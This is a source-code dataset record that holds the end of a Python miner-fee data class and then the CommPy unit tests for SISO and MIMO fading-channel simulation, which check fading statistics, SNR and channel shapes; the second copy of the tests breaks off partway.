getattr(self, "set_%s" % key.lower())(value)
except AttributeError:
pass
def get_btc(self):
return self.__btc
def set_btc(self, btc: MinerFeesItem):
self.__btc = btc
def get_bch(self):
return self.__bch
def set_bch(self, bch: MinerFeesItem):
self.__bch = bch
def get_eth(self):
return self.__eth
def set_eth(self, eth: MinerFeesItem):
self.__eth = eth
def get_usdc(self):
return self.__usdc
def set_usdc(self, usdc: MinerFeesItem):
self.__usdc = usdc
def get_gusd(self):
return self.__gusd
def set_gusd(self, gusd: MinerFeesItem):
self.__gusd = gusd
def get_doge(self):
return self.__doge
def set_doge(self, doge: MinerFeesItem):
self.__doge = doge
def get_ltc(self):
return self.__ltc
def set_ltc(self, ltc: MinerFeesItem):
self.__ltc = ltc
def get_pax(self):
return self.__pax
def set_pax(self, pax: MinerFeesItem):
self.__pax = pax
def get_busd(self):
return self.__busd
def set_busd(self, busd: MinerFeesItem):
self.__busd = busd
def get_xrp(self):
return self.__xrp
def set_xrp(self, xrp: MinerFeesItem):
self.__xrp = xrp
def to_json(self):
data = {
"btc": self.get_btc(),
"bch": self.get_bch(),
"eth": self.get_eth(),
"usdc": self.get_usdc(),
"gusd": self.get_gusd(),
"pax": self.get_pax(),
"doge": self.get_doge(),
"ltc": self.get_ltc(),
"xrp": self.get_xrp(),
"busd": self.get_busd(),
}
data = {key: value for key, value in data.items() if value}
return data
| true | true |
f72331ce7e5021c4af4e2217fc8fa2d1b6c67d72 | 22,215 | py | Python | commpy/tests/test_channels.py | goodcq/CommPy | af3a9acba32d2f9c6b723705f709fee2cb9352e2 | [
"BSD-3-Clause"
] | 2 | 2018-11-18T22:10:49.000Z | 2019-07-12T08:35:24.000Z | commpy/tests/test_channels.py | goodcq/CommPy | af3a9acba32d2f9c6b723705f709fee2cb9352e2 | [
"BSD-3-Clause"
] | null | null | null | commpy/tests/test_channels.py | goodcq/CommPy | af3a9acba32d2f9c6b723705f709fee2cb9352e2 | [
"BSD-3-Clause"
] | 1 | 2020-10-13T10:33:23.000Z | 2020-10-13T10:33:23.000Z | # Authors: CommPy contributors
# License: BSD 3-Clause
from __future__ import division, print_function # Python 2 compatibility
from math import cos
from numpy import ones, inf, sqrt, array, identity, zeros, dot, trace, einsum, absolute, exp, pi, fromiter, kron, \
zeros_like, empty
from numpy.random import seed, choice, randn
from numpy.testing import run_module_suite, assert_raises, assert_equal, assert_allclose, \
assert_array_equal, dec
from commpy.channels import SISOFlatChannel, MIMOFlatChannel
from commpy.utilities import signal_power
class TestSISOFlatChannel:
msg_length = 100000
real_mods = array((-1, 1)), array((-3, 3))
all_mods = array((-1, 1)), array((-3, 3)), \
array((-1 - 1j, -1 + 1j, 1 - 1j, 1 + 1j)), array((-3 - 3j, -3 + 3j, 3 - 3j, 3 + 3j))
def test_default_args(self):
def check(chan):
assert_equal(chan.noises, None,
err_msg='Default noises is not None')
assert_equal(chan.channel_gains, None,
err_msg='Default channel gains is not None')
assert_equal(chan.unnoisy_output, None,
err_msg='Default unnoisy output is not None')
chan = SISOFlatChannel()
# Test output state before any propagation
check(chan)
# Test that noise standard deviation must be set before propagation
with assert_raises(AssertionError):
chan.propagate(array((1, 1)))
# Test output state before any propagation
check(chan)
assert_equal(chan.nb_rx, 1,
err_msg='SISO channel as more than 1 Rx')
assert_equal(chan.nb_tx, 1,
err_msg='SISO channel as more than 1 Tx')
def test_fading(self):
# Set seed
seed(17121996)
def check_chan_gain(mod, chan):
msg = choice(mod, self.msg_length)
chan.propagate(msg)
P_msg = signal_power(msg)
P_unnoisy = signal_power(chan.unnoisy_output)
assert_allclose(P_unnoisy, P_msg, rtol=0.2,
err_msg='Channel add or remove energy')
# Test value checking in constructor construction
with assert_raises(ValueError):
SISOFlatChannel(0, (1, 1))
chan = SISOFlatChannel(0)
# Test on real channel
for mod in self.real_mods:
# Test value checking after construction
with assert_raises(ValueError):
chan.fading_param = (1, 1)
# Test without fading
chan.fading_param = (1, 0)
check_chan_gain(mod, chan)
assert_array_equal(chan.channel_gains, ones(self.msg_length),
err_msg='Channel fading while fading is disabled')
# Test with Rayleigh fading
chan.fading_param = (0, 1)
check_chan_gain(mod, chan)
assert_allclose(absolute(chan.channel_gains.mean()), 0, atol=2e-2,
err_msg='Wrong channel mean with real channel')
assert_allclose(chan.channel_gains.var(), 1, atol=0.2,
err_msg='Wrong channel variance with real channel')
# Test with rician fading
chan.fading_param = (sqrt(2 / 3), 1 / 3)
check_chan_gain(mod, chan)
assert_allclose(chan.channel_gains.mean(), sqrt(2 / 3), atol=2e-2,
err_msg='Wrong channel mean with real channel')
assert_allclose(chan.channel_gains.var(), 1 / 3, atol=0.2,
err_msg='Wrong channel variance with real channel')
# Test on complex channel
for mod in self.all_mods:
# Test value checking after construction
with assert_raises(ValueError):
chan.fading_param = (1, 1)
# Test without fading
chan.fading_param = (1 + 0j, 0)
check_chan_gain(mod, chan)
assert_array_equal(chan.channel_gains, ones(self.msg_length),
err_msg='Channel fading while fading is disabled')
# Test with Rayleigh fading
chan.fading_param = (0j, 1)
check_chan_gain(mod, chan)
assert_allclose(absolute(chan.channel_gains.mean()), 0, atol=2e-2,
err_msg='Wrong channel mean with real channel')
assert_allclose(chan.channel_gains.var(), 1, atol=0.2,
err_msg='Wrong channel variance with real channel')
# Test with rician fading
chan.fading_param = (0.5 + 0.5j, 0.5)
check_chan_gain(mod, chan)
assert_allclose(absolute(chan.channel_gains.mean()), sqrt(0.5), atol=2e-2,
err_msg='Wrong channel mean with real channel')
assert_allclose(chan.channel_gains.var(), 0.5, atol=0.2,
err_msg='Wrong channel variance with real channel')
def test_noise_generation(self):
# Set seed
seed(17121996)
def check_noise(mod, chan, corrected_SNR_lin):
msg = choice(mod, self.msg_length)
chan.propagate(msg)
P_msg = signal_power(msg) # previous test asserted that channel neither add nor remove energy
P_noise = signal_power(chan.noises)
assert_allclose(absolute(chan.noises.mean()), 0., atol=5e-2,
err_msg='Noise mean is not 0')
if corrected_SNR_lin == inf:
assert_allclose(P_noise, 0, atol=1e-2,
err_msg='There is noise that should not be here')
else:
assert_allclose(P_msg / P_noise, corrected_SNR_lin, atol=0.2,
err_msg='Wrong SNR')
chan = SISOFlatChannel(fading_param=(1 + 0j, 0))
for mod in self.all_mods:
chan.noise_std = 0
check_noise(mod, chan, inf)
chan.set_SNR_lin(6, Es=signal_power(mod))
check_noise(mod, chan, 6)
chan.set_SNR_lin(6, .5, signal_power(mod))
check_noise(mod, chan, 3)
chan.set_SNR_dB(0, Es=signal_power(mod))
check_noise(mod, chan, 1)
chan.set_SNR_dB(0, .5, signal_power(mod))
check_noise(mod, chan, .5)
chan = SISOFlatChannel(fading_param=(1, 0))
for mod in self.real_mods:
chan.noise_std = 0
check_noise(mod, chan, inf)
chan.set_SNR_lin(6, Es=signal_power(mod))
check_noise(mod, chan, 6)
chan.set_SNR_lin(6, .5, signal_power(mod))
check_noise(mod, chan, 3)
chan.set_SNR_dB(0, Es=signal_power(mod))
check_noise(mod, chan, 1)
chan.set_SNR_dB(0, .5, signal_power(mod))
check_noise(mod, chan, .5)
def test_type_check(self):
chan = SISOFlatChannel(0)
with assert_raises(TypeError):
chan.propagate(array((1, 1j)))
def test_k_factor(self):
# Real channel
chan = SISOFlatChannel()
assert_allclose(chan.k_factor, inf,
err_msg='k-factor should be infinite without fading in SISO channels')
chan.fading_param = 0, 1
assert_allclose(chan.k_factor, 0,
err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
chan.fading_param = sqrt(0.5), 0.5
assert_allclose(chan.k_factor, 1,
err_msg='Wrong k-factor with rician fading in SISO channels')
# Complex channel
chan.fading_param = 1j, 0
assert_allclose(chan.k_factor, inf,
err_msg='k-factor should be infinite without fading in SISO channels')
chan.fading_param = 0j, 1
assert_allclose(chan.k_factor, 0,
err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
chan.fading_param = 0.5 + 0.5j, 0.5
assert_allclose(chan.k_factor, 1,
err_msg='Wrong k-factor with rician fading in SISO channels')
class MIMOTestCase(object):
msg_length = 100000
real_mods = array((-1, 1)), array((-3, 3))
all_mods = array((-1, 1)), array((-3, 3)), \
array((-1 - 1j, -1 + 1j, 1 - 1j, 1 + 1j)), array((-3 - 3j, -3 + 3j, 3 - 3j, 3 + 3j))
@staticmethod
def random_SDP_matrix(n):
G = randn(n, n)
dot(G, G.T, G)
return G / trace(G)
def test_symetric(self):
nb_tx = 8
nb_rx = 8
self.do(nb_tx, nb_rx)
def test_more_rx(self):
nb_tx = 4
nb_rx = 8
self.do(nb_tx, nb_rx)
def test_more_tx(self):
nb_tx = 8
nb_rx = 4
self.do(nb_tx, nb_rx)
def test_SIMO(self):
nb_tx = 1
nb_rx = 8
self.do(nb_tx, nb_rx)
def test_MISO(self):
nb_tx = 8
nb_rx = 1
self.do(nb_tx, nb_rx)
def test_SISO(self):
nb_tx = 1
nb_rx = 1
self.do(nb_tx, nb_rx)
class TestMIMODefaultArgs(MIMOTestCase):
def __init__(self):
super(TestMIMODefaultArgs, self).__init__()
def do(self, nb_tx, nb_rx):
def check(chan):
assert_equal(chan.noises, None,
err_msg='Default noises is not None')
assert_equal(chan.channel_gains, None,
err_msg='Default channel gains is not None')
assert_equal(chan.unnoisy_output, None,
err_msg='Default unnoisy output is not None')
chan = MIMOFlatChannel(nb_tx, nb_rx)
# Test output state before any propagation
check(chan)
# Test that noise standard deviation must be set before propagation
with assert_raises(AssertionError):
chan.propagate(array((1, 1)))
# Test output state before any propagation
check(chan)
@dec.slow
class TestMIMOFading(MIMOTestCase):
def __init__(self):
super(TestMIMOFading, self).__init__()
def do(self, nb_tx, nb_rx):
# Set seed
seed(17121996)
def check_chan_gain(mod, chan):
msg = choice(mod, self.msg_length)
chan.propagate(msg)
P_msg = signal_power(msg)
P_unnoisy = signal_power(chan.unnoisy_output)
assert_allclose(P_unnoisy, P_msg * chan.nb_tx, rtol=0.2,
err_msg='Channel add or remove energy')
def expo_correlation(t, r):
# Construct the exponent matrix
expo_tx = fromiter((j - i for i in range(chan.nb_tx) for j in range(chan.nb_tx)), int, chan.nb_tx ** 2)
expo_rx = fromiter((j - i for i in range(chan.nb_rx) for j in range(chan.nb_rx)), int, chan.nb_rx ** 2)
# Reshape
expo_tx = expo_tx.reshape(chan.nb_tx, chan.nb_tx)
expo_rx = expo_rx.reshape(chan.nb_rx, chan.nb_rx)
return t ** expo_tx, r ** expo_rx
def check_correlation(chan, Rt, Rr):
nb_ant = chan.nb_tx * chan.nb_rx
Rdes = kron(Rt, Rr)
H = chan.channel_gains
Ract = zeros_like(Rdes)
for i in range(len(H)):
Ract += H[i].T.reshape(nb_ant, 1).dot(H[i].T.reshape(1, nb_ant).conj())
Ract /= len(H)
assert_allclose(Rdes, Ract, atol=0.05,
err_msg='Wrong correlation matrix')
# Test value checking in constructor construction
with assert_raises(ValueError):
MIMOFlatChannel(nb_tx, nb_tx, 0, (ones((nb_tx, nb_tx)), ones((nb_tx, nb_tx)), ones((nb_rx, nb_rx))))
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
prod_nb = nb_tx * nb_rx
# Test on real channel
for mod in self.real_mods:
# Test value checking after construction
with assert_raises(ValueError):
chan.fading_param = (ones((nb_tx, nb_tx)), ones((nb_tx, nb_tx)), ones((nb_rx, nb_rx)))
# Test with Rayleigh fading
chan.fading_param = (zeros((nb_rx, nb_tx)), identity(nb_tx), identity(nb_rx))
check_chan_gain(mod, chan)
# Test with rician fading
mean = randn(nb_rx, nb_tx)
mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
Rt = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
chan.fading_param = (mean, Rt, Rr)
check_chan_gain(mod, chan)
# Test helper functions
chan.uncorr_rayleigh_fading(float)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 0,
err_msg='Wrong k-factor with uncorrelated Rayleigh fading')
mean = randn(nb_rx, nb_tx)
chan.uncorr_rician_fading(mean, 10)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 10,
err_msg='Wrong k-factor with uncorrelated rician fading')
# Test on complex channel
for mod in self.all_mods:
# Test value checking after construction
with assert_raises(ValueError):
chan.fading_param = (ones((nb_tx, nb_tx)), ones((nb_tx, nb_tx)), ones((nb_rx, nb_rx)))
# Test with Rayleigh fading
chan.fading_param = (zeros((nb_rx, nb_tx), complex), identity(nb_tx), identity(nb_rx))
check_chan_gain(mod, chan)
assert_allclose(chan.channel_gains.mean(), 0, atol=1e-2,
err_msg='Wrong channel mean with complex channel')
assert_allclose(chan.channel_gains.var(), 1, atol=5e-2,
err_msg='Wrong channel variance with complex channel')
# Test with rician fading
mean = randn(nb_rx, nb_tx) + 1j * randn(nb_rx, nb_tx)
mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
Rt = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
chan.fading_param = (mean, Rt, Rr)
check_chan_gain(mod, chan)
assert_allclose(chan.channel_gains.mean(0).real, mean.real, atol=0.1,
err_msg='Wrong channel mean with complex channel')
assert_allclose(chan.channel_gains.mean(0).imag, mean.imag, atol=0.1,
err_msg='Wrong channel mean with complex channel')
# Test helper functions
chan.uncorr_rayleigh_fading(complex)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 0,
err_msg='Wrong k-factor with uncorrelated Rayleigh fading')
mean = randn(nb_rx, nb_tx) + randn(nb_rx, nb_tx) * 1j
chan.uncorr_rician_fading(mean, 10)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 10,
err_msg='Wrong k-factor with uncorrelated rician fading')
chan.expo_corr_rayleigh_fading(exp(-0.2j * pi), exp(-0.1j * pi))
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 0,
err_msg='Wrong k-factor with correlated Rayleigh fading')
Rt, Rr = expo_correlation(exp(-0.2j * pi), exp(-0.1j * pi))
check_correlation(chan, Rt, Rr)
mean = randn(nb_rx, nb_tx) + randn(nb_rx, nb_tx) * 1j
chan.expo_corr_rician_fading(mean, 10, exp(-0.1j * pi), exp(-0.2j * pi))
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 10,
err_msg='Wrong k-factor with correlated rician fading')
# Test with beta > 0
chan.expo_corr_rayleigh_fading(exp(-0.2j * pi), exp(-0.1j * pi), 1, 0.5)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 0,
err_msg='Wrong k-factor with correlated Rayleigh fading')
mean = randn(nb_rx, nb_tx) + randn(nb_rx, nb_tx) * 1j
chan.expo_corr_rician_fading(mean, 5, exp(-0.1j * pi), exp(-0.2j * pi), 3, 2)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 5,
err_msg='Wrong k-factor with correlated rician fading')
class TestMIMOSpectular(MIMOTestCase):
def __init__(self):
super(TestMIMOSpectular, self).__init__()
def do(self, nb_tx, nb_rx):
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
# Test raising of ValueError
with assert_raises(ValueError):
chan.specular_compo(0, -1, 0, 1)
with assert_raises(ValueError):
chan.specular_compo(0, 1, 0, -1)
# Test the result
desired = empty((nb_rx, nb_tx), dtype=complex)
for n in range(nb_rx):
for m in range(nb_tx):
desired[n, m] = exp(1j * 2 * pi * (n * 1 * cos(0.5) - m * 0.1 * cos(2)))
assert_allclose(chan.specular_compo(2, 0.1, 0.5, 1), desired, rtol=0.02,
err_msg='Wrong specular component')
@dec.slow
class TestMIMONoiseGeneration(MIMOTestCase):
def __init__(self):
super(TestMIMONoiseGeneration, self).__init__()
def do(self, nb_tx, nb_rx):
# Set seed
seed(17121996)
def check_noise(mod, chan, corrected_SNR_lin):
msg = choice(mod, self.msg_length)
chan.propagate(msg)
P_msg = signal_power(msg) # previous test asserted that channel neither add nor remove energy
P_noise = signal_power(chan.noises)
assert_allclose(abs(chan.noises.mean()), 0., atol=0.5,
err_msg='Noise mean is not 0')
if corrected_SNR_lin == inf:
assert_allclose(P_noise, 0, atol=1e-2,
err_msg='There is noise that should not be here')
else:
assert_allclose(chan.nb_tx * P_msg / P_noise, corrected_SNR_lin, atol=0.2,
err_msg='Wrong SNR')
fading_param = zeros((nb_rx, nb_tx), complex), identity(nb_tx), identity(nb_rx)
chan = MIMOFlatChannel(nb_tx, nb_rx, fading_param=fading_param)
for mod in self.all_mods:
chan.noise_std = 0
check_noise(mod, chan, inf)
chan.set_SNR_lin(6, Es=signal_power(mod))
check_noise(mod, chan, 6)
chan.set_SNR_lin(6, .5, signal_power(mod))
check_noise(mod, chan, 3)
chan.set_SNR_dB(0, Es=signal_power(mod))
check_noise(mod, chan, 1)
chan.set_SNR_dB(0, .5, signal_power(mod))
check_noise(mod, chan, .5)
class TestMIMOTypeCheck(MIMOTestCase):
def __init__(self):
super(TestMIMOTypeCheck, self).__init__()
def do(self, nb_tx, nb_rx):
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
with assert_raises(TypeError):
chan.propagate(array((1, 1j)))
class TestMIMOShapes(MIMOTestCase):
def __init__(self):
super(TestMIMOShapes, self).__init__()
def do(self, nb_tx, nb_rx):
# Without padding
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
out = chan.propagate(ones(nb_tx * 2))
assert_array_equal(chan.channel_gains.shape, (2, nb_rx, nb_tx),
err_msg='Wrong channel shape without padding')
assert_array_equal(chan.noises.shape, (2, nb_rx),
err_msg='Wrong channel shape without padding')
assert_array_equal(chan.unnoisy_output.shape, (2, nb_rx),
err_msg='Wrong channel shape without padding')
assert_array_equal(out.shape, (2, nb_rx),
err_msg='Wrong channel shape without padding')
# With padding
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
out = chan.propagate(ones(nb_tx * 2 + 1))
assert_array_equal(chan.channel_gains.shape, (3, nb_rx, nb_tx),
err_msg='Wrong channel shape with padding')
assert_array_equal(chan.noises.shape, (3, nb_rx),
err_msg='Wrong channel shape with padding')
assert_array_equal(chan.unnoisy_output.shape, (3, nb_rx),
err_msg='Wrong channel shape with padding')
assert_array_equal(out.shape, (3, nb_rx),
err_msg='Wrong channel shape with padding')
class TestMIMOkFactor(MIMOTestCase):
def __init__(self):
super(TestMIMOkFactor, self).__init__()
def do(self, nb_tx, nb_rx):
# Set seed
seed(17121996)
prod_nb = nb_tx * nb_rx
# Real channel
chan = MIMOFlatChannel(nb_tx, nb_rx)
assert_allclose(chan.k_factor, 0,
err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
mean = randn(nb_rx, nb_tx)
mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
Rs = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
chan.fading_param = mean, Rs, Rr
assert_allclose(chan.k_factor, 3,
err_msg='Wrong k-factor with rician fading in SISO channels')
# Complex channel
chan.fading_param = (zeros((nb_rx, nb_tx), complex), identity(nb_tx), identity(nb_rx))
assert_allclose(chan.k_factor, 0,
err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
mean = randn(nb_rx, nb_tx) + 1j * randn(nb_rx, nb_tx)
mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
Rs = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
chan.fading_param = (mean, Rs, Rr)
assert_allclose(chan.k_factor, 3,
err_msg='Wrong k-factor with rician fading in SISO channels')
if __name__ == "__main__":
run_module_suite()
| 40.244565 | 115 | 0.577358 |
from __future__ import division, print_function
from math import cos
from numpy import ones, inf, sqrt, array, identity, zeros, dot, trace, einsum, absolute, exp, pi, fromiter, kron, \
zeros_like, empty
from numpy.random import seed, choice, randn
from numpy.testing import run_module_suite, assert_raises, assert_equal, assert_allclose, \
assert_array_equal, dec
from commpy.channels import SISOFlatChannel, MIMOFlatChannel
from commpy.utilities import signal_power
class TestSISOFlatChannel:
    """Statistical unit tests for commpy.channels.SISOFlatChannel."""

    # Number of random symbols propagated per statistical check.
    msg_length = 100000
    # Real-valued test constellations (2-PAM and a scaled variant).
    real_mods = array((-1, 1)), array((-3, 3))
    # Real constellations plus complex (QPSK-like) counterparts.
    all_mods = array((-1, 1)), array((-3, 3)), \
        array((-1 - 1j, -1 + 1j, 1 - 1j, 1 + 1j)), array((-3 - 3j, -3 + 3j, 3 - 3j, 3 + 3j))

    def test_default_args(self):
        """A fresh channel has unset outputs and exactly one Tx/Rx antenna."""

        def check(chan):
            # Nothing has been propagated yet, so every output must be None.
            assert_equal(chan.noises, None,
                         err_msg='Default noises is not None')
            assert_equal(chan.channel_gains, None,
                         err_msg='Default channel gains is not None')
            assert_equal(chan.unnoisy_output, None,
                         err_msg='Default unnoisy output is not None')

        chan = SISOFlatChannel()
        check(chan)

        # Propagating without a configured noise level must fail...
        with assert_raises(AssertionError):
            chan.propagate(array((1, 1)))
        # ...and must not have touched the channel state.
        check(chan)

        assert_equal(chan.nb_rx, 1,
                     err_msg='SISO channel as more than 1 Rx')
        assert_equal(chan.nb_tx, 1,
                     err_msg='SISO channel as more than 1 Tx')

    def test_fading(self):
        """Check energy conservation and fading statistics (noise disabled)."""
        seed(17121996)  # fixed seed: all checks below are statistical

        def check_chan_gain(mod, chan):
            # Propagate a long random message and verify the channel does
            # not add or remove average energy.
            msg = choice(mod, self.msg_length)
            chan.propagate(msg)

            P_msg = signal_power(msg)
            P_unnoisy = signal_power(chan.unnoisy_output)

            assert_allclose(P_unnoisy, P_msg, rtol=0.2,
                            err_msg='Channel add or remove energy')

        # Invalid fading parameters must be rejected at construction.
        with assert_raises(ValueError):
            SISOFlatChannel(0, (1, 1))

        chan = SISOFlatChannel(0)

        # Real channel
        for mod in self.real_mods:
            with assert_raises(ValueError):
                chan.fading_param = (1, 1)

            # No fading (mean 1, variance 0): gains must be exactly 1.
            chan.fading_param = (1, 0)
            check_chan_gain(mod, chan)
            assert_array_equal(chan.channel_gains, ones(self.msg_length),
                               err_msg='Channel fading while fading is disabled')

            # Real Rayleigh-like fading: zero mean, unit variance.
            chan.fading_param = (0, 1)
            check_chan_gain(mod, chan)
            assert_allclose(absolute(chan.channel_gains.mean()), 0, atol=2e-2,
                            err_msg='Wrong channel mean with real channel')
            assert_allclose(chan.channel_gains.var(), 1, atol=0.2,
                            err_msg='Wrong channel variance with real channel')

            # Real Rician-like fading: mean sqrt(2/3), variance 1/3
            # (mean^2 / var = 2, cf. the k-factor checks below).
            chan.fading_param = (sqrt(2 / 3), 1 / 3)
            check_chan_gain(mod, chan)
            assert_allclose(chan.channel_gains.mean(), sqrt(2 / 3), atol=2e-2,
                            err_msg='Wrong channel mean with real channel')
            assert_allclose(chan.channel_gains.var(), 1 / 3, atol=0.2,
                            err_msg='Wrong channel variance with real channel')

        # Complex channel
        for mod in self.all_mods:
            with assert_raises(ValueError):
                chan.fading_param = (1, 1)

            # No fading with a complex mean: gains must be exactly 1.
            chan.fading_param = (1 + 0j, 0)
            check_chan_gain(mod, chan)
            assert_array_equal(chan.channel_gains, ones(self.msg_length),
                               err_msg='Channel fading while fading is disabled')

            # Complex Rayleigh fading: zero mean, unit variance.
            chan.fading_param = (0j, 1)
            check_chan_gain(mod, chan)
            assert_allclose(absolute(chan.channel_gains.mean()), 0, atol=2e-2,
                            err_msg='Wrong channel mean with real channel')
            assert_allclose(chan.channel_gains.var(), 1, atol=0.2,
                            err_msg='Wrong channel variance with real channel')

            # Complex Rician fading: |mean| = sqrt(0.5), variance 0.5.
            chan.fading_param = (0.5 + 0.5j, 0.5)
            check_chan_gain(mod, chan)
            assert_allclose(absolute(chan.channel_gains.mean()), sqrt(0.5), atol=2e-2,
                            err_msg='Wrong channel mean with real channel')
            assert_allclose(chan.channel_gains.var(), 0.5, atol=0.2,
                            err_msg='Wrong channel variance with real channel')

    def test_noise_generation(self):
        """Check the measured SNR against the configured one."""
        seed(17121996)  # fixed seed: all checks below are statistical

        def check_noise(mod, chan, corrected_SNR_lin):
            msg = choice(mod, self.msg_length)
            chan.propagate(msg)

            P_msg = signal_power(msg)
            P_noise = signal_power(chan.noises)

            assert_allclose(absolute(chan.noises.mean()), 0., atol=5e-2,
                            err_msg='Noise mean is not 0')
            if corrected_SNR_lin == inf:
                # noise_std == 0: there must be no noise power at all.
                assert_allclose(P_noise, 0, atol=1e-2,
                                err_msg='There is noise that should not be here')
            else:
                assert_allclose(P_msg / P_noise, corrected_SNR_lin, atol=0.2,
                                err_msg='Wrong SNR')

        # Complex channel (no fading, so only the noise is random).
        chan = SISOFlatChannel(fading_param=(1 + 0j, 0))
        for mod in self.all_mods:
            chan.noise_std = 0
            check_noise(mod, chan, inf)
            chan.set_SNR_lin(6, Es=signal_power(mod))
            check_noise(mod, chan, 6)
            # A code rate of .5 halves the effective SNR.
            chan.set_SNR_lin(6, .5, signal_power(mod))
            check_noise(mod, chan, 3)
            chan.set_SNR_dB(0, Es=signal_power(mod))
            check_noise(mod, chan, 1)
            chan.set_SNR_dB(0, .5, signal_power(mod))
            check_noise(mod, chan, .5)

        # Real channel.
        chan = SISOFlatChannel(fading_param=(1, 0))
        for mod in self.real_mods:
            chan.noise_std = 0
            check_noise(mod, chan, inf)
            chan.set_SNR_lin(6, Es=signal_power(mod))
            check_noise(mod, chan, 6)
            chan.set_SNR_lin(6, .5, signal_power(mod))
            check_noise(mod, chan, 3)
            chan.set_SNR_dB(0, Es=signal_power(mod))
            check_noise(mod, chan, 1)
            chan.set_SNR_dB(0, .5, signal_power(mod))
            check_noise(mod, chan, .5)

    def test_type_check(self):
        """A real-fading channel must reject complex input symbols."""
        chan = SISOFlatChannel(0)
        with assert_raises(TypeError):
            chan.propagate(array((1, 1j)))

    def test_k_factor(self):
        """Check the Rician k-factor for real and complex fading params."""
        chan = SISOFlatChannel()

        # Real channel
        assert_allclose(chan.k_factor, inf,
                        err_msg='k-factor should be infinite without fading in SISO channels')
        chan.fading_param = 0, 1
        assert_allclose(chan.k_factor, 0,
                        err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
        chan.fading_param = sqrt(0.5), 0.5
        assert_allclose(chan.k_factor, 1,
                        err_msg='Wrong k-factor with rician fading in SISO channels')

        # Complex channel
        chan.fading_param = 1j, 0
        assert_allclose(chan.k_factor, inf,
                        err_msg='k-factor should be infinite without fading in SISO channels')
        chan.fading_param = 0j, 1
        assert_allclose(chan.k_factor, 0,
                        err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
        chan.fading_param = 0.5 + 0.5j, 0.5
        assert_allclose(chan.k_factor, 1,
                        err_msg='Wrong k-factor with rician fading in SISO channels')
class MIMOTestCase(object):
    """Base class for MIMO channel test cases.

    Subclasses implement ``do(nb_tx, nb_rx)``; the ``test_*`` methods run
    it over the usual antenna configurations (symmetric, more Rx, more Tx,
    SIMO, MISO and SISO).
    """

    # Number of random symbols propagated per statistical check.
    msg_length = 100000
    # Real-valued test constellations.
    real_mods = array((-1, 1)), array((-3, 3))
    # Real constellations plus complex (QPSK-like) counterparts.
    all_mods = array((-1, 1)), array((-3, 3)), \
        array((-1 - 1j, -1 + 1j, 1 - 1j, 1 + 1j)), array((-3 - 3j, -3 + 3j, 3 - 3j, 3 + 3j))

    @staticmethod
    def random_SDP_matrix(n):
        """Return a random symmetric positive semi-definite n-by-n matrix
        normalized to unit trace.

        Bug fix: the previous code called ``dot(G, G.T, G)``, passing ``G``
        both as an operand and as numpy's ``out`` argument. ``numpy.dot``
        does not guard against this aliasing, so the result is undefined;
        compute the product into a fresh array instead.
        """
        G = randn(n, n)
        G = dot(G, G.T)  # G @ G.T is symmetric PSD with positive trace (a.s.)
        return G / trace(G)

    def test_symetric(self):
        """Same number of Tx and Rx antennas."""
        nb_tx = 8
        nb_rx = 8
        self.do(nb_tx, nb_rx)

    def test_more_rx(self):
        """More Rx than Tx antennas."""
        nb_tx = 4
        nb_rx = 8
        self.do(nb_tx, nb_rx)

    def test_more_tx(self):
        """More Tx than Rx antennas."""
        nb_tx = 8
        nb_rx = 4
        self.do(nb_tx, nb_rx)

    def test_SIMO(self):
        """Single Tx antenna, several Rx antennas."""
        nb_tx = 1
        nb_rx = 8
        self.do(nb_tx, nb_rx)

    def test_MISO(self):
        """Several Tx antennas, single Rx antenna."""
        nb_tx = 8
        nb_rx = 1
        self.do(nb_tx, nb_rx)

    def test_SISO(self):
        """Degenerate 1x1 case."""
        nb_tx = 1
        nb_rx = 1
        self.do(nb_tx, nb_rx)
class TestMIMODefaultArgs(MIMOTestCase):
    """Check that a freshly built MIMO channel exposes no outputs."""

    def __init__(self):
        super(TestMIMODefaultArgs, self).__init__()

    def do(self, nb_tx, nb_rx):
        """Outputs stay None before and after a failed propagation."""

        def assert_untouched(channel):
            # Every output attribute must still be unset.
            expectations = (
                (channel.noises, 'Default noises is not None'),
                (channel.channel_gains, 'Default channel gains is not None'),
                (channel.unnoisy_output, 'Default unnoisy output is not None'),
            )
            for value, message in expectations:
                assert_equal(value, None, err_msg=message)

        channel = MIMOFlatChannel(nb_tx, nb_rx)
        assert_untouched(channel)

        # Propagating without a configured noise level must fail and must
        # leave the channel state untouched.
        with assert_raises(AssertionError):
            channel.propagate(array((1, 1)))
        assert_untouched(channel)
@dec.slow
class TestMIMOFading(MIMOTestCase):
    """Statistical tests of the MIMO fading models (noise disabled)."""

    def __init__(self):
        super(TestMIMOFading, self).__init__()

    def do(self, nb_tx, nb_rx):
        seed(17121996)  # fixed seed: all checks below are statistical

